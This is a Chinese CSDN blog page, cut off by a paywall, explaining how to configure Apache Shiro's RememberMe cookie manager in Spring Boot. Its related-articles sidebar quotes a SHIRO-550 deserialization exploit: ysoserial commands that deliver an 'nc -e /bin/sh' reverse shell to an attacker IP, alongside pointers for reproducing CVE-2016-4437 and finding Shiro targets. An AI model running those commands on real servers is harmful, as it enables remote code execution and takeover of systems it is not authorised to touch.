Spring Boot系列(十五) 安全框架Apache Shiro(三)RememberMe

最新推荐文章于 2024-05-06 08:30:00 发布
最新推荐文章于 2024-05-06 08:30:00 发布
阅读量1.2w 收藏 18
点赞数 2
分类专栏: SpringBoot Shiro RememberMe 文章标签: SpringBoot Shiro RememberMe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xtiawxf/article/details/52625104
版权
Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下:首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来;关闭浏览器再重新打开;会发现浏览器还是记住你的;访问一般的网页服务器端还是知道你是谁,且能正常
摘要由CSDN通过智能技术生成

Shiro提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下:

  1. 首先在登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe的Cookie写到客户端并保存下来;
  2. 关闭浏览器再重新打开;会发现浏览器还是记住你的;
  3. 访问一般的网页服务器端还是知道你是谁,且能正常访问;
  4. 但是比如我们访问淘宝时,如果要查看我的订单或进行支付时,此时还是需要再进行身份认证的,以确保当前用户还是你。

下面是基于上一章节缓存的案例,增加RememberMe的步骤:
步骤1:在ShiroConfiguration配置中 创建Cookie(记住我)管理器@Bean

/**
* cookie管理器;
* @return
*/
@Bean
public CookieRememberMeManager rememberMeManager(){
    logger.info("注入Shiro的记住我(CookieRememberMeManager)管理器-->rememberMeManager", CookieRememberMeManager.class);
    CookieRememberMeManager cookieRememberMeManager = new CookieRememberMeManager();
    //rememberme cookie加密的密钥 建议每个项目都不一样 默认AES算法 密钥长度(128 256 512 位),通过以下代码可以获取
    //KeyGenerator keygen = KeyGenerator.getInstance("AES");
    //SecretKey deskey = keygen.generateKey();
    //System.out.println(Base64.encodeToString(deskey.getEncoded()));
    byte[] cipherK
最低0.47元/天 解锁文章
xtiawxf
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 记住密码 安全_Java 通过 Shiro 配置 RememberMe 实现记住密码功能
weixin_29692851的博客
02-28 575
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理功能,可为任何应用提供安全保障 - 从命令行应用、移动应用到大型网络及企业应用。下面讲述一下如何实现记住密码,一般记住密码就是把用户的基本信息存入浏览器Cookie,下次登录时优先验证Cookie,后端做处理操作,依此来实现记住密码操作,而shiro中自带RememberMe功能,只需简单配置即可。注意:对于...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
Shiro的rememberMe功能
weixin_65824274的博客
07-05 1548
当登录后是可以正常访问/man的主页的,如果使用了记住我功能,会在浏览器写入cookie,关掉浏览器不需要登录即可直接访问/main.Shiro 提供了记住我(RememerMe)的功能,比如访问一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。4.但是,如果我们访问电商平台时,如果要查看我的订单或进行支付时,此时还 是需要再进行身份认证的,以确保当前用户还是你。2.登录时不勾选记住我,关闭浏览器访问主页/main还会拦截到登录页;1.配置记住我功能的cookie设置;
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
最新发布
程序员阿皓的博客
05-06 144
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
Apache Shiro 的Remember Me
王浩的技术博客
10-18 284
Shiro中提供“记住我”的功能,其与已认证有着明显的区别: l Remembered(记住我):一个记住我的Subject 不是匿名的,而且有一个已知的身份ID(也就是subject.getPrincipals()是非空的)。但是这个被记住的身份ID 是在之前的session 中被认证的。如果subject.isRemembered()返回true,则Subject 被认为是被记住的。 l...
快速掌握shiro安全框架(四)之remember me功能
bigdata_dog的博客
03-04 894
ShiroConfig配置类中添加记住我和cookie相关配置项以及用户过滤器
Apache Shiro(七)——Shiro的RememberMe功能
传臣、的博客
10-28 9416
一、概述 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下: 1、首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的Cookie 写到客户端并保存下来; 2、关闭浏览器再重新打开;会发现浏览器还是记住你的; 3、访问一般...
Apache shiro的简单介绍与使用教程(与spring整合使用)
09-15
Apache Shiro是一个全面的Java安全框架,它提供了一套简洁且直观的API,用于处理身份认证、授权、会话管理和加密等安全相关的任务。Shiro的设计目标是保持易用性,使得开发者能快速地集成到现有系统中,而无需深入...
my-spring-boot集成shiro
04-18
在本文中,我们将深入探讨如何将`Spring Boot`与`Apache Shiro`进行集成,以构建一个安全的基础框架。`Spring Boot`以其便捷的启动和配置方式,为开发者提供了快速开发现代Java应用的能力,而`Apache Shiro`则是一个...
Spring Boot整合Shiro.zip
08-30
Apache Shiro是一个轻量级的安全框架,它的设计目标是简化企业级应用的安全管理。Shiro提供了一种直观、简单的API,用于处理身份验证(登录)、授权(权限控制)、会话管理和密码加密等功能。 2. **Spring Boot...
楠哥Spring Boot整合Shiro.zip
11-24
2. **配置Shiro**:在Spring Boot的配置文件(application.properties或application.yml)中,我们可以配置Shiro的相关属性,如RememberMe的密钥、session超时时间等。 3. **创建Shiro配置类**:在Spring Boot项目...
spring boot shiro demo项目
04-03
Apache Shiro是一个强大且易用的Java安全框架,提供了认证、授权(权限)、加密和会话管理功能,可以非常轻松地开发出足够安全的应用。在Spring Boot项目中集成Shiro,可以简化权限控制的复杂度,使得开发者能够更加...
Shiro反序列问题修复
weixin_38277138的博客
05-15 1919
Shiro反序列问题修复
Apache Shiro (Shiro-550)(cve_2016_4437)远程代码执行 - 漏洞复现
m0_49936858的博客
08-12 378
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。再来看,我们的shell已经是弹出来了,此次教程已经完结。工具上直接添加kali机ip。以及nc监听的端口,就可以。飞鸿表哥的,哈哈哈,底下是下载连接,喜欢的点一手。添加完事ip+端口直接下一步,接下来我们弹shell。监听好之后点击file。用vulhub 部署。.
Apache Shiro-RememberMe 反序列化漏洞
chaojixiaojingang
08-21 6193
1.资产查找 Fofa: app="Apache-Shiro" 2.影响版本 Apache Shiro <= 1.2.4 3.漏洞描述 Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。可造成远程命令执行,完全控制服务器权限。 目前已经出..
springboot + shiro 实现记住我
快乐的小三菊的博客
05-21 1687
第一次登录的时候,需要用户自己输入用户名和密码,选中记住的标签。登录成功之后,此时关掉浏览器,再打开浏览器,再次输入刚才的网址,即可发现这次登录不需要再输入用户名和密码,即可直接进入验证通过的界面。达到的最终效果就是第一次使用账号和密码登录(登录成功),此时退出浏览器,然后重新打开网页登录界面,就会自动登录到登录成功的网页上。我们平常在登录网站的时候,经常会发现网页上有个。是如何实现,说白了就是携带参数,将请求发送到。此时,启动工程,输入网址。类是如何实现,需要注意的是。,看下浏览器帮我们保存的。
使用SpringBoot+Shiro实现记住我功能
m0_67393593的博客
04-28 348
1、加入需要用到的包 <dependencies> <dependency> <groupId>org.apache.shiro</groupId> <artifactId>shiro-spring</artifactId> <version>1.3.2</version> </dependency&gt
Apache Shiro-550反序列化漏洞分析
qq_61991235的博客
09-11 551
shrio550详细调试分析
【漏洞复现】Apache系列(一)之Shiro漏洞复现
qq_45244158的博客
02-23 4858
Apache Shiro550反序列化(CVE-2016-4437)漏洞 Apache Shiro 认证绕过漏洞(CVE-2020-1957) 漏洞
Spring Boot 整合 Shiro.docx
06-19
Apache Shiro 是一个功能强大、灵活的,开源的安全框架。它可以干净利落地处理身份验证、授权、企业会话管理和加密。 Apache Shiro 的首要目标是易于使用和理解。安全通常很复杂,甚至让人感到很痛苦,但是 Shiro 却不是这样子的。一个好的安全框架应该屏蔽复杂性,向外暴露简单、直观的 API,来简化开发人员实现应用程序安全所花费的时间和精力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值